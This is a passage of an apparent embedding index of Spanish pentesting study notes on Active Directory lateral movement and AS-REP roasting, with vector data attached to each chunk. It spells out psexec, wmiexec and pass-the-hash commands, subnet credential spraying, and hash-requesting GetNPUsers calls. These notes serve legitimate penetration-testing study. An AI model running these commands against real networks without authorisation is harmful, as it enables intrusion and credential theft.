0.01294, -0.0289, 0.05347, -0.0555, -0.10654, 0.06128, 0.02845, -0.00653, 0.02248, -0.07989, 0.04259, -0.1398, -0.04057, -0.07246, -0.0426, 0.0646, -0.06766, 0.16001, 0.0477, -0.04661, 0.05032, 0.04542, 0.13137, -0.0336, 0.13174, 0.10941, -0.0462, -0.03977, 0.01749, -0.0086, -0.06292, -0.05468, 0.0514, -0.01388, 0.02128, 0.01868, 0.07885, 0.02028, -0.02527, 0.0094, 0.05176, -0.14338, -0.06762, -0.04395, -0.03294, -0.04644, 0.01208, 0.0404, -0.02956, 0.05003, -0.02151, -0.05072, 0.06069, -0.04655, 0.06605, -0.01757, 0.13894, 0.01374, -0.01335, 0.04206, -0.04055, 0.01886, 0.07401, -0.00217, 0.01748, 0.05444, -0.06081, 0.08594, 0.04076, -0.00353, -0.02631, -0.03895, -0.02121, 0.09016, -0.04858, -0.00269, -0.0523, -0.00951, -0.05243, -0.00048, -0.02838, 0.00152, -0.02156, 0.00983, 0.02873, -0.08314, 0.03132, -0.03065, -0.00478, 0.08893, 0.0577, -0.00154, 0.04261, -0.04486, 0.02066, -0.00103, 0.04121, 0.00985, -0.00579, -0.05441, 0.04701, 0.03584, -0.01615, -0.04329, -0.05686, 0.02191, 0.02645, 0.03853, -0.06023, -0.03339, -0.02275, 0.02349, 0.03948, 0.01552, -0.01658, -0.01586, 0.00112, -0.00955, -0.02723, 0.01913, 0.04363, -0.08601, 0.10774, -0.05701, -0.0198, -0.02094, 0.03132, -0.0475, 0.03457, 0.00428, 0.03074, -0.00393, 0.02395, 0.00239, -0.00554, -0.03134, -0.00421, 0.01363, 0.00699, 0.01718, 0.00539, -0.03276, 0.06444, -0.06591, 0.00712, -0.0035, 0.01124, 0.00627, 0.01145, 0.01077, 0.03538, -0.01575, 0.00171, 0.02939, -0.05933, 0.02358, 0.00882, -0.02421, 0.04182, -0.03136, -0.01403, 0.01576, -0.01555, -0.01805, -0.03619, -0.00317, 0.03822, 0.035, 0.03542, 0.01964, 0.00965, 0.01318, 0.01612, -0.0247, -0.04458, 0.01064, 0.02158, 0.03814, -0.01656, -0.0109, 0.02095, 0.0291, -0.03225, 0.00489, -0.02503, -0.05262, 0.05064, 0.01167, 0.04984, -0.04339, 0.01953, -0.0422, -0.04471, 0.0099, -0.01614, -0.01732, 0.00369, -0.03398, -0.00569, -0.03537, -0.01603, 0.01]} +{"tipo": "metodologia", "herramienta": "Movimiento lateral", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Movimiento lateral.md", "texto": "# Movimiento lateral\n\n> Saltar de una máquina a otra con credenciales/hashes obtenidos. Paso 5-6 de la cadena de Active Directory.", "v": [0.04339, -0.06566, -0.03317, -0.11271, -0.1581, -0.06353, -0.07179, 0.00581, -0.07076, 0.16919, -0.04731, 0.01828, -0.02819, -0.09518, 0.10607, 0.13045, 0.0289, -0.02027, -0.09226, -0.03695, -0.03326, 0.01223, -0.14102, -0.04322, 0.07252, 0.1725, -0.06795, 0.00229, -0.16069, 0.0572, 0.01122, 0.07697, -0.10719, 0.06829, 0.07778, -0.05764, -0.17443, 0.06324, 0.04424, 0.04876, -0.05217, 0.08882, -0.1282, -0.05312, 0.0422, -0.02885, 0.03158, 0.02383, -0.04717, 0.02986, -0.02958, -0.04383, -0.11291, -0.07836, 0.01421, -0.08779, 0.06125, 0.10204, -0.03469, -0.12119, 0.03367, -0.05337, -0.00109, -0.05476, -0.07176, -0.02536, 0.09782, -0.05828, -0.06133, -0.00639, -0.0279, 0.12921, -0.06381, 0.16112, 0.02648, 0.02551, 0.12462, -0.01808, 0.01216, 0.16691, 0.02771, -0.10478, 0.07066, -0.06064, -0.07269, -0.08938, 0.0242, -0.15369, 0.06019, 0.02499, 0.08334, 0.12984, -0.06963, -0.04218, 0.04033, 0.03801, 0.02696, 0.02948, -0.02985, -0.05904, -0.00952, 0.01487, -0.01969, 0.09497, 0.02788, 0.0677, 0.0516, 0.06861, 0.01348, 0.05824, 0.04484, -0.02974, 0.03514, -0.06118, -0.06968, 0.18353, -0.03535, 0.01506, -0.07772, 0.04066, 0.0016, 0.0536, 0.13467, -0.03993, -0.01597, -0.00283, -0.13835, 0.03346, 0.02389, 0.01251, -0.0127, 0.02845, -0.06483, -0.0637, 0.00342, 0.00124, 0.06043, -0.03404, -0.04687, -0.12019, 0.0352, -0.00473, -0.04603, 0.06764, 0.02649, -0.0028, 0.03844, -0.03875, -0.00519, 0.00554, -0.00314, 0.06787, 0.02131, -0.11829, -0.02566, 0.07633, -0.00474, -0.076, -0.0726, 0.04831, -0.04964, -0.00419, -0.02534, 0.06121, -0.0527, -0.05567, -0.0163, 0.02012, 0.0532, 0.06936, 0.03615, 0.01229, -0.06618, -0.03307, 0.04322, 0.04408, -0.02169, 0.02789, -0.03463, -0.03431, 0.01858, 0.03009, -0.05096, -0.05736, 0.04866, -0.04749, 0.01272, -0.03691, 0.09207, -0.03464, 0.06364, -0.02146, -0.02259, -0.00436, 0.01462, 0.00124, 0.02986, 0.01588, 0.06483, -0.05143, -0.00334, 0.01577, 0.0123, -0.04834, 0.01807, 0.02318, -0.00041, 0.03966, 0.02365, 0.03632, 0.07643, -0.02072, 0.03313, 0.02954, -0.13111, 0.00083, 0.02348, -0.05276, -0.04324, 0.03023, -0.00454, 0.04098, 0.05026, 0.01933, 0.02289, -0.01956, -0.06729, 0.09038, 0.01127, 0.0173, 0.01785, -0.04842, 0.01269, -0.02171, 0.00571, 0.02341, 0.04089, 0.01608, 0.00961, -0.00092, -0.03064, -0.0317, 0.05212, 0.00121, -0.0047, 0.06869, -0.0648, 0.0322, -0.01798, 0.0354, -0.08088, 0.04344, -0.021, -0.10215, 0.00909, -0.01949]} +{"tipo": "metodologia", "herramienta": "Movimiento lateral", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Movimiento lateral.md", "texto": "## Con qué saltas\n```bash\nimpacket-psexec dominio/user:pass@10.10.10.20 # shell SYSTEM\nimpacket-wmiexec dominio/user:pass@10.10.10.20 # sin tocar disco\nimpacket-psexec -hashes :NTLMHASH user@10.10.10.20 # Pass-the-Hash\nnxc smb 10.10.10.0/24 -u user -p pass # ¿dónde valen estas creds?\nxfreerdp /u:user /p:pass /v:10.10.10.20 # RDP si hay GUI\nevil-winrm -i 10.10.10.20 -u user -p pass # WinRM (5985)\n```", "v": [0.02409, -0.19344, -0.03068, -0.03696, -0.02611, -0.10844, -0.10567, -0.02495, -0.00855, 0.10586, -0.02364, -0.03503, 0.00848, -0.09737, -0.07506, -0.0422, -0.01687, 0.10583, -0.05688, -0.00187, 0.06916, 0.04772, -0.00257, 0.02567, 0.04683, 0.02602, -0.03043, -0.02912, -0.08468, -0.02574, -0.00012, -0.08926, -0.15065, -0.08531, 0.01005, 0.02881, 0.02064, 0.04332, 0.11021, 0.13628, 0.03592, 0.1472, -0.00061, 0.10203, 0.0062, -0.01443, 0.03292, 0.10742, 0.1105, -0.13529, -0.04271, -0.0341, -0.14178, 0.01322, 0.0226, 0.03068, 0.09694, -0.03322, 0.01277, 0.02206, 0.07951, 0.04514, 0.03435, 0.01388, 0.04137, -0.03074, 0.05129, -0.08943, -0.00376, 0.06364, -0.048, 0.00639, 0.15173, 0.03494, 0.0955, -0.03631, 0.11578, -0.07184, 0.05945, 0.03601, 0.02715, -0.0404, -0.04077, -0.16263, -0.09958, -0.00756, 0.02813, -0.0139, 0.04901, -0.03348, -0.03562, -0.11971, -0.04608, 0.01053, -0.04973, -0.08985, -0.04188, 0.04423, -0.05741, 0.01424, -0.01607, -0.03315, -0.08914, -0.00634, 0.00695, 0.01667, 0.03522, 0.0423, 0.0192, 0.11856, 0.05543, -0.0578, -0.02223, 0.03563, -0.02361, -0.05215, -0.10757, -0.04512, -0.02311, 0.01377, 0.00769, 0.08944, 0.07957, -0.09811, 0.01715, -0.07888, -0.01225, 0.07605, -0.02513, -0.0788, -0.00859, 0.00921, 0.01997, 0.04634, -0.00905, 0.00233, -0.01017, 0.04157, -0.07411, -0.06157, 0.05112, 0.01591, -0.02001, 0.01218, 0.02824, 0.05783, 0.09564, -0.0483, -0.13728, 0.04384, 0.0483, -0.04848, -0.00698, -0.03102, -0.05487, 0.01888, -0.016, 0.00725, -0.07225, 0.01112, 0.02809, 0.04527, 0.00752, -0.01883, -0.01994, 0.12278, 0.10722, 0.0025, -0.00574, -0.08435, -0.04138, 0.05147, -0.03774, 0.01087, -0.02903, -0.00922, 0.07647, -0.05683, -0.06997, -0.02446, 0.06452, -0.11865, 0.05879, 0.01135, 0.06816, 0.02036, -0.04569, 0.03634, -0.00608, 0.01164, -0.04272, -0.03382, 0.05061, 0.02407, 0.03072, 0.00232, 0.03379, -0.00218, -0.00615, 0.07059, 0.09573, 0.01686, 0.04643, -0.10241, 0.04765, -0.06232, 0.00419, 0.04103, 0.06589, 0.03487, 0.05125, 0.01105, -0.04329, -0.07831, -0.03651, -0.17263, -0.01299, -0.03426, 0.02941, -0.09583, 0.04899, 0.04567, 0.02145, 0.04469, -0.02337, -0.01294, -0.0309, 0.0385, 0.10079, 0.00747, -0.06913, 0.03817, -0.08093, -0.05929, -0.00392, 0.04664, 0.02003, -0.03279, -0.10691, -0.03976, -0.09526, 0.12105, 0.00445, -0.09356, -0.05386, 0.02032, 0.03311, 0.04452, -0.00895, -0.06254, -0.04995, -0.08396, -0.0582, -0.14054, 0.03601, 0.1786]} +{"tipo": "metodologia", "herramienta": "Movimiento lateral", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Movimiento lateral.md", "texto": "## Regla clave\n**Reutiliza credenciales**: cada pass/hash que pillas → pruébalo contra **todos** los hosts y servicios (Metodología OSCP).", "v": [-0.08936, -0.22897, -0.14343, -0.06386, 0.06151, -0.17406, 0.0623, -0.01306, -0.09966, -0.08252, -0.09571, -0.00474, 0.05926, 0.01331, 0.09273, 0.00798, -0.01965, 0.00893, 0.03669, -0.09858, -0.10371, -0.08769, -0.2029, 0.077, -0.00888, 0.04998, 0.11622, 0.00825, -0.0751, -0.04977, -0.04232, -0.06734, -0.05821, -0.10955, -0.04392, 0.15207, -0.11956, 0.08949, 0.0378, 0.10833, -0.04731, 0.09569, -0.0962, 0.11832, 0.13057, -0.04538, 0.06719, 0.11157, -0.08749, 0.03367, 0.03313, -0.13078, -0.21665, -0.0759, 0.03606, -0.12643, -0.06934, 0.02357, -0.11372, -0.06519, -0.05615, 0.08171, -0.00415, -0.01387, 0.17277, -0.09674, -0.01525, -0.09167, -0.14155, 0.0548, -0.03911, 0.00695, -0.04302, -0.04019, 0.03594, -0.01798, 0.05228, -0.00791, 0.11198, 0.06273, -0.04958, -0.08038, 0.02471, -0.05573, -0.04578, -0.01843, 0.05808, -0.1001, 0.01811, -0.04484, 0.11448, 0.01708, 0.11473, 0.03348, -0.05525, -0.03575, -0.01072, 0.01538, 0.0759, -0.04733, -0.0262, 0.06282, -0.0084, 0.12262, 0.0178, 0.01549, 0.06541, -0.0477, 0.06604, -0.00157, 0.06851, -0.01903, 0.03029, 0.03793, -0.05313, -0.01846, -0.00404, 0.01111, -0.01651, -0.039, 0.02122, -0.10022, 0.04692, 0.0036, 0.04558, 0.03995, -0.01975, 0.03018, -0.00187, 0.03003, -0.01896, 0.01007, -0.08898, 0.05319, 0.07944, 0.01304, 0.02554, -0.01105, -0.00557, 0.01675, 0.04933, 0.04413, -0.01935, 0.03557, 0.0388, -0.05578, 0.01637, -0.08843, -0.06491, 0.03425, 0.07198, 0.09237, 0.00345, 0.02697, -0.0449, -0.02688, 0.04048, -0.06015, -0.10308, 0.10364, -0.03867, -0.05675, 0.07789, 0.06447, -0.0155, -0.00504, 0.03561, -0.02139, -0.03403, -0.02136, 0.02986, -0.01184, -0.07762, -0.01349, 0.02818, 0.00795, 0.0236, -0.07612, -0.03377, -0.09366, 7e-05, -0.0228, -0.00512, 0.02168, -0.00976, -0.00897, 0.00718, 0.07027, 0.02928, -0.00329, 0.09792, -0.00789, -0.03261, 0.04365, -0.03569, 0.01752, -0.00265, -0.06478, 0.00732, -0.00807, -0.04069, -0.00243, 0.01, -0.03527, -0.02157, -0.02634, 0.0198, -0.02034, -0.02585, 0.01563, 0.02487, -0.06223, 0.02597, -0.03256, -0.03236, 0.01136, -0.0039, 0.0529, -0.00465, -0.00068, 0.05189, 0.07615, -0.02826, 0.00229, 0.00504, 0.00809, 0.04413, 0.00467, 0.07596, 0.01854, -0.05469, -0.01836, -0.00139, -0.02639, 0.00869, -0.02464, 0.01503, -0.03676, -0.03683, -0.10576, 0.01839, -0.01521, -0.04168, -0.02608, -0.02175, -0.00575, -0.00917, 0.01053, 0.04843, -0.00977, -0.02641, -0.05883, -0.01665, -0.07131, 0.0332, -0.00598]} +{"tipo": "metodologia", "herramienta": "Movimiento lateral", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Movimiento lateral.md", "texto": "## Decidir a dónde\n- BloodHound te dice qué usuario es admin dónde y el camino a Domain Admin.\n- Si llegas al DC → secretsdump / DCSync → Golden Ticket.\n- Red interna no enrutable → Pivoting ligolo-ng.\n\nRelacionado: Impacket · Mimikatz · OSCP MOC", "v": [-0.29354, -0.10693, -0.03182, -0.06341, 0.02246, -0.13012, -0.14129, 0.05617, -0.13168, 0.10963, 0.07931, -0.17767, -0.09581, -0.23768, 0.00874, -0.10571, 0.11632, 0.06621, 0.02364, -0.20979, -0.02492, -0.01182, -0.01511, -0.02268, 0.18448, 0.00124, 0.07888, 0.09825, -0.08258, -0.03071, 0.10572, -0.12279, 0.05946, -0.05475, -0.00241, -0.10923, 0.01141, 0.05343, 0.07112, 0.11614, -0.068, 0.02668, -0.11351, 0.0621, -0.00969, -0.10323, 0.1367, -0.06999, 0.03764, -0.09305, -0.10345, -0.05185, -0.15344, -0.02785, 0.02255, 0.03839, -0.05526, -0.02933, 0.01018, 0.04079, 0.02701, 0.00425, -0.05922, 0.01494, 0.0051, 0.05704, -0.08826, 0.02296, -0.0146, 0.08945, 0.03883, 0.08536, 0.0566, 0.01207, 0.11576, -0.05785, 0.1355, -0.03502, 0.17112, 0.03326, 0.05528, 0.09909, -0.05677, 0.02054, 0.01212, -0.07664, 0.11518, -0.06952, -0.02605, 0.0142, 0.10014, -0.03917, 0.00627, 0.04474, -0.00627, -0.07334, -0.0586, -0.08748, -0.00451, -0.03712, -0.03387, 0.13042, -0.09191, 0.02562, -0.01748, 0.01952, 0.02234, -0.1018, 0.06174, -0.02392, 0.0913, 0.05707, -0.0166, 0.03859, -0.03818, 0.0156, 0.11219, 0.00959, 0.03511, -0.02121, -0.09574, 0.02928, -0.02589, -0.06326, -0.00968, 0.01459, 0.03303, 0.0198, 0.03094, -0.02573, -0.04935, -0.0309, -0.01489, -0.0107, 0.01768, 0.03091, 0.02281, 0.00603, 0.01399, -0.02325, 0.00371, -0.09638, -0.00012, 0.02391, 0.03652, -0.01153, -0.02192, -0.02478, 0.02264, 0.03395, -0.03214, -0.02437, -0.01428, -0.02529, -0.01584, 0.06482, -0.00719, -0.01949, -0.08182, 0.01495, -0.00338, 0.01248, 0.01328, -0.03826, -0.02162, -0.00574, 0.04588, 0.0224, -0.04571, -0.06228, -0.01144, 0.00805, -0.04406, -0.0074, -0.05514, -0.07021, 0.04359, -0.03738, 0.02362, -0.02324, 0.07468, -0.02693, 0.00058, 0.05882, -0.04024, 0.03785, 0.04628, -0.01316, 0.01381, -0.02225, -0.0318, -0.04024, 0.06841, -0.00335, 0.03008, -0.04054, 0.0595, -0.08092, -0.02351, -0.03105, 0.00932, 0.00656, -0.00806, 0.02174, 0.07124, -0.01134, 0.01604, 0.05415, -0.0813, 0.03749, 0.04841, -0.0154, 0.03917, 0.00545, 0.01016, -0.01482, -0.01049, 0.01632, -0.03751, -0.01973, -0.00138, 0.02488, 0.01592, -0.00631, 0.00775, 0.00932, -0.00535, -0.01709, 0.01403, 0.0462, 0.00886, 0.07405, -0.05477, -0.00173, -0.00573, -0.00508, -0.02608, 0.01749, 0.01173, -0.00803, 0.01932, 0.01291, 0.03014, -0.00585, -0.02807, -0.05708, 0.00615, 0.02677, -0.00062, -0.0092, 0.02248, -0.03734, -0.02205, -0.03168, -0.03936, 0.00737]} +{"tipo": "metodologia", "herramienta": "AS-REP Roasting", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/AS-REP Roasting.md", "texto": "# AS-REP Roasting\n\n> Usuarios con **\"Do not require Kerberos pre-authentication\"** → pides su AS-REP y crackeas el hash, **sin necesitar credenciales**. Camino de Active Directory.", "v": [-0.08633, -0.20314, -0.01301, -0.0705, 0.20639, -0.0905, -0.0165, 0.08973, -0.07897, 0.16637, -0.089, -0.12012, -0.08487, -0.15662, 0.23828, -0.08166, -0.15915, 0.18205, 0.03022, 0.19334, 0.05937, -0.03095, -0.19869, 0.13774, 0.09805, 0.10798, -0.04335, -0.00674, -0.01429, -0.02394, 0.00995, 0.00928, -0.04479, -0.00419, -0.06497, -0.03175, -0.10228, -0.00229, 0.13591, 0.2703, 0.01686, 0.09945, -0.11617, 0.1318, -0.00603, 0.03257, 0.02229, -0.02001, -0.00303, 0.07075, 0.02542, -0.07295, -0.1567, -0.0236, 0.04865, 0.03317, 0.09406, -0.04781, -0.1186, -0.06342, -0.0376, -0.03724, 0.05554, -0.02305, 0.02495, -0.11729, 0.03231, -0.11064, -0.03886, 0.04467, -0.0988, 0.04827, 0.00533, 0.02213, 0.04101, -0.03292, 0.04658, -0.06166, 0.03746, 0.09443, 0.08222, -0.01961, 0.01829, 0.00623, -0.01234, -0.0837, 0.03332, -0.01068, 0.04983, -0.00192, 0.09126, 0.04343, -0.00239, 0.02243, 0.06877, -0.02087, -0.07714, 0.03837, -0.01193, 0.00129, -0.10423, -0.00759, 0.00198, 0.01468, -0.02859, -0.00641, 0.02598, 0.03552, 0.09755, -0.0228, 0.05688, 0.01026, -0.02472, -0.0198, 0.03489, 0.07091, -0.02691, -0.07026, 0.02648, 0.03267, 0.01423, -0.02861, 0.01756, 0.04774, 0.03116, 0.02277, -0.0046, 0.09773, 0.01984, -0.03926, 0.03787, -0.04293, 0.00428, 0.02033, -0.00022, 0.01645, -0.04224, -0.05318, -0.03929, -0.04004, -0.04148, 0.02577, 0.03108, 0.03279, 0.04374, 0.02376, 0.01728, 0.02069, 0.00143, 0.01925, 0.02962, 0.09689, -0.01974, 0.05677, 0.01646, 7e-05, 0.04394, -0.00901, -0.00645, 0.09261, -0.00547, -0.05139, 0.0406, 0.01257, -0.03262, 0.02187, 0.02332, -0.02904, 0.02375, 0.04265, 0.02355, -0.01834, -0.03709, -0.05501, 0.01329, 0.02203, 0.09147, -0.00164, -0.06192, -0.02891, 0.05837, -0.08723, 0.0827, 0.0573, -0.02129, -0.00399, -0.02155, 0.00831, -0.00484, -0.03602, 0.05895, 0.02049, 0.01608, 0.02633, 0.01126, -0.02015, 0.06381, -0.03847, -0.01878, 0.03568, -0.03969, 0.04019, -0.01556, -0.04545, 0.03411, 0.0039, 0.01954, -0.00283, 0.00144, 0.01324, -0.03228, -0.03313, 0.01546, -0.0337, -0.05892, -0.00853, 0.02822, 0.06106, -0.04698, 0.04026, 0.00681, 0.03226, 0.01345, 0.04985, 0.03687, 0.0385, 0.00135, 0.01595, -0.02677, 0.03557, 0.03217, 0.0338, -0.03499, -0.04784, -0.0165, 0.00257, -0.04355, -0.00307, -0.00273, 0.00627, -0.00189, 0.00414, -0.02518, 0.00895, -0.02139, 0.03726, -0.04036, -0.03156, 0.04216, 0.00223, 0.00602, 0.00917, -0.04883, -0.04884, 0.00025, -0.01896]} +{"tipo": "metodologia", "herramienta": "AS-REP Roasting", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/AS-REP Roasting.md", "texto": "# con lista de usuarios (sesión nula / enum previa con SMB):\nimpacket-GetNPUsers dominio/ -usersfile users.txt -no-pass -dc-ip IP", "v": [-0.00396, -0.0887, -0.1478, -0.12872, 0.04371, -0.24068, -0.06626, -0.08225, -0.07679, 0.13344, -0.00457, -0.07618, 0.06805, -0.19244, -0.16898, -0.06618, 0.0393, 0.01584, 0.10565, -0.14316, -0.02096, 0.13005, -0.07719, -0.01258, -0.03654, 0.13217, -0.07144, -0.00411, -0.00873, -0.06402, -0.02266, -0.22449, -0.05415, -0.13086, -0.08469, -0.14931, 0.0486, 0.07486, 0.00271, 0.16926, 0.08368, 0.12744, -0.18193, 0.05723, -0.0305, 0.00059, -0.02523, 0.00126, 0.03062, -0.18997, -0.05847, -0.04965, -0.07706, 0.00608, -0.1475, -0.05261, 0.12352, -0.12235, -0.04047, -0.01312, -0.08082, 0.14579, -0.02862, 0.01675, 0.0258, -0.01509, 0.01668, 0.01061, -0.10399, 0.05149, 0.03445, 0.05956, 0.00402, -0.03036, 0.12638, -0.01907, 0.03476, -0.08335, 0.01762, 0.06528, 0.01822, 0.00194, -0.07364, -0.07845, -0.14546, -0.06376, -0.0072, -0.04501, 0.04323, 0.02783, 0.08522, 0.03557, -0.00061, 0.00027, 0.06808, -0.03749, 0.05915, 0.01334, -0.01296, -0.02965, 0.01631, 0.11384, -0.09179, 0.0739, 0.05707, 0.02482, 0.06393, 0.01975, 0.01194, 0.03547, 0.08104, -0.03205, 0.0166, -0.00567, -0.00149, -0.00953, -0.02527, -0.06511, -0.01917, -0.03053, -0.03655, -0.04425, -0.03234, -0.01183, -0.02009, 0.03621, 0.08574, 0.02034, -0.02834, -0.09169, 0.01351, -0.04001, -0.0665, -0.0194, -0.0233, 0.00813, 0.00621, 0.00059, -0.08121, 0.04796, 0.02395, 0.01525, -0.07298, 0.09346, 0.01875, -0.09317, 0.05105, -0.09337, -0.05045, 0.01054, 0.04294, 0.00641, -0.03983, 0.00751, -0.05334, 0.05347, -0.03344, -0.07194, 0.01653, -0.0351, -0.01145, 0.01031, -0.01778, 0.03034, -0.00247, 0.02222, 0.00496, 0.0261, 0.04826, -0.00661, -0.00547, -0.00565, 0.01793, -0.06947, 0.01034, -0.06757, 0.0354, 0.04306, 0.01421, -0.05833, -0.00587, -0.09395, 0.02133, 0.03394, -0.04373, -0.05264, 0.01722, -0.01365, 0.01135, 0.0268, -0.0074, 0.08904, -0.02929, 0.0472, 0.03617, -0.0392, -0.05263, -0.00502, -0.04229, 0.01553, -0.00902, 0.02508, 0.00179, -0.00102, -0.01464, -0.04469, 0.00275, 0.00829, 0.01148, -0.06263, 0.01575, -0.00112, 0.00704, -0.05853, -0.04207, 0.00374, 0.00376, 0.03614, 0.01071, -0.06363, -0.04101, 0.06625, 0.01254, -0.01096, 0.02885, 0.01346, 0.00847, -0.03931, 0.01882, -0.00691, 0.01317, 0.02634, -0.01271, -0.00177, 0.06633, -0.02712, -0.02483, 0.02229, -0.00236, 0.0052, -0.04047, 0.0335, 0.00852, -0.02312, -0.02165, -0.01369, -0.05799, -0.00045, -0.01675, -0.01209, -0.05429, -0.03255, 0.00913, 0.00582, -0.03924, 0.00614]} +{"tipo": "metodologia", "herramienta": "AS-REP Roasting", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/AS-REP Roasting.md", "texto": "# con credenciales (enumera y pide a la vez):\nimpacket-GetNPUsers dominio/usuario:password -request -dc-ip IP\n```", "v": [-0.08778, -0.06992, -0.14479, -0.14788, 0.12232, -0.20385, 0.11343, -0.06549, -0.16114, 0.02813, 0.10208, -0.00603, -0.07653, -0.20404, -0.15651, -0.0664, 0.0762, 0.1107, 0.13294, -0.10735, -0.03264, 0.11999, -0.11706, 0.00339, -0.061, 0.1222, -0.05008, 0.03658, -0.00526, -0.03879, -0.03905, -0.1581, -0.16245, -0.05365, -0.16065, -0.11381, 0.02747, 0.09903, 0.01432, 0.18935, 0.01387, 0.05862, -0.1588, 0.07954, 0.00714, 0.0814, 0.01929, -0.05676, 0.04512, -0.1464, -0.09233, -0.13406, -0.05547, -0.06424, -0.03902, 0.05491, 0.11674, -0.04803, -0.00494, 0.02141, -0.05396, 0.04063, -0.0095, 0.06358, 0.01624, -0.03801, -0.02237, -0.05554, -0.02211, 0.03925, 0.02357, -0.06287, -0.05846, 0.01448, 0.12516, -0.07949, 0.06471, -0.06565, 0.08629, 0.0761, 0.00801, 0.0421, -0.06606, -0.07519, -0.1102, -0.04138, 0.00623, -0.0824, 0.06611, 0.01066, 0.10132, 0.06117, -0.03815, -0.01022, 0.03003, -0.04749, -0.02565, 0.01503, -0.08831, -0.08743, -0.07628, 0.10676, -0.07092, 0.05492, 0.03151, -0.00373, 0.07224, 0.05877, 0.04069, -0.0214, 0.05592, 0.00222, -0.01148, -0.0207, 0.02903, 0.04845, -0.08092, -0.07028, 0.05192, -0.03079, 0.02596, -0.06378, 0.03729, 0.00244, -0.00665, 0.04925, 0.01265, 0.00022, -0.03649, -0.14269, -0.02264, -0.03969, -0.00156, 0.00586, 0.04934, 0.02712, -0.02712, -0.05718, -0.06754, 0.08755, 0.02978, -0.00904, -0.07106, 0.03969, 0.05514, -0.04391, 0.04173, -0.07289, -0.04284, -0.02595, 0.0251, 0.02579, -0.01713, -0.00621, -0.03954, 0.03984, -0.02534, -0.0575, 0.00917, 0.0018, -0.00025, 0.00325, 0.00108, 0.04533, -0.00751, -0.01147, -0.00176, -0.01967, 0.05034, 0.00264, -0.03331, -0.00676, -0.02213, 0.00631, -0.02036, -0.04285, 0.03334, 0.00364, -0.01085, -0.06724, -0.01071, -0.0819, 0.04181, 0.03917, 0.00388, -0.01844, 0.05168, -0.01033, -0.02975, -0.00487, 0.07592, 0.03388, -0.02888, 0.05664, 0.02746, -0.03744, -0.01352, -0.02918, -0.02575, -0.00523, -0.03971, -0.00542, -0.00073, -0.00032, -0.01564, -0.0152, 0.02134, -0.00312, 0.00063, -0.03927, 0.01296, -0.03036, 0.01489, -0.08436, -0.07843, -0.00148, -0.01959, 0.07174, -0.06881, -0.05818, -0.02255, 0.07105, -0.02752, 0.01252, 0.03521, 0.00602, -0.00148, -0.00543, 0.0228, -0.01795, -0.02191, 0.02839, -0.03429, -0.02954, 0.0628, -0.0173, -0.01332, -0.01111, -0.00516, 0.02042, -0.04333, 0.00494, 0.03278, -0.01917, -0.04353, -0.00607, -0.0624, 0.01633, -0.01153, 0.01868, -0.06502, -0.0347, -0.03355, -0.00902, -0.01825, 0.01158]} +{"tipo": "metodologia", "herramienta": "AS-REP Roasting", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/AS-REP Roasting.md", "texto": "## Diferencia con Kerberoasting\n- **AS-REP** = usuarios SIN pre-auth → **no necesitas password** para pedir el hash.\n- **Kerberoasting** = cuentas de servicio (SPN) → necesitas una credencial válida.\n\nRelacionado: Cracking de contraseñas · Kerberoasting · Kerberos · Impacket · OSCP MOC", "v": [-0.11742, -0.23177, -0.00754, -0.1036, 0.06977, -0.33456, -0.00928, 0.09402, -0.06573, -0.02595, -0.10475, -0.06278, 0.00708, -0.22126, 0.07932, -0.00556, -0.07329, 0.01303, 0.13373, 0.16826, 0.09934, 0.05249, -0.07873, 0.03089, -0.094, 0.13042, -0.00289, -0.01445, -0.08644, 0.06693, -0.07327, -0.0618, -0.06351, 0.06319, -0.02433, 0.02661, -0.11719, 0.1178, 0.08764, 0.22183, 0.03456, 0.14959, -0.01023, 0.1527, 0.04636, -0.01019, 0.01738, 0.06558, -0.04653, 0.04199, 0.01825, -0.09897, -0.18082, 0.00097, 0.01472, -0.02467, 0.07421, -0.04375, -0.11634, 0.01395, -0.02938, -0.01246, -0.04071, 0.01171, 0.01325, -0.15184, 0.04022, -0.03705, -0.01758, 0.0607, -0.07724, 0.05146, 0.01448, -0.02171, 0.06033, -0.01762, 0.12341, -0.10261, 0.0556, 0.09176, -0.02469, -0.03662, 0.02238, -0.02298, -0.04632, -0.04899, 0.0491, 0.00545, 0.04792, -0.00572, 0.07777, 0.04066, 0.00822, -0.00394, 0.05172, -0.08837, -0.14109, -0.00858, -0.08031, -0.08493, -0.06213, 0.08282, -0.0156, 0.01126, -0.03606, -0.02237, 0.03285, 0.04142, 0.08618, -0.08113, 0.08231, 0.00226, 0.00738, -0.02496, -0.02848, 0.0389, 0.00092, -0.04417, 0.08034, 0.0633, -0.02732, -0.00104, 0.04016, -0.0007, -0.01128, 0.02183, 0.03378, 0.03523, -0.04375, -0.05748, -0.00106, -0.03, -0.05508, 0.05302, 0.00118, 0.06439, -0.02294, -0.06857, -0.02971, 0.00682, -0.04432, 0.00212, -0.03719, -0.01866, 0.01735, 0.05601, 0.04395, 0.00626, -0.04419, -0.00498, 0.02875, 0.02761, -0.05987, 0.01753, 0.01431, -0.05514, -0.02573, -0.07885, -0.05175, 0.05517, 0.02257, -0.07101, 0.08279, 0.0372, -0.01915, -0.01877, 0.05188, 0.02056, -0.00486, -0.00272, -0.00438, 0.01365, -0.0032, 0.04542, 0.01575, -0.04979, 0.09761, -0.03494, -0.06537, -0.06616, 0.02816, -0.11906, 0.07624, 0.00296, 0.00419, -0.02834, 0.05933, -0.02972, -0.00522, -0.03459, 0.04884, -0.02034, -0.02132, 0.06066, 0.02292, -0.01191, 0.0524, -0.03871, -0.01263, -0.00718, -0.06415, 0.00144, -0.00132, 0.00812, 0.03228, -0.00173, 0.02479, -0.02518, -0.04309, -0.00428, 0.00739, -0.02199, 0.00911, -0.05945, -0.0548, -0.03494, 0.00532, 0.01664, -0.00217, 0.02071, -0.0199, 0.01432, 0.02104, 0.04463, 0.03663, -0.00261, -0.02753, -0.01614, -0.01948, -0.0102, 0.02361, 0.02651, -0.02266, -0.02384, 0.03872, -0.03012, -0.06834, 0.00474, 0.01242, 0.00266, -0.02058, 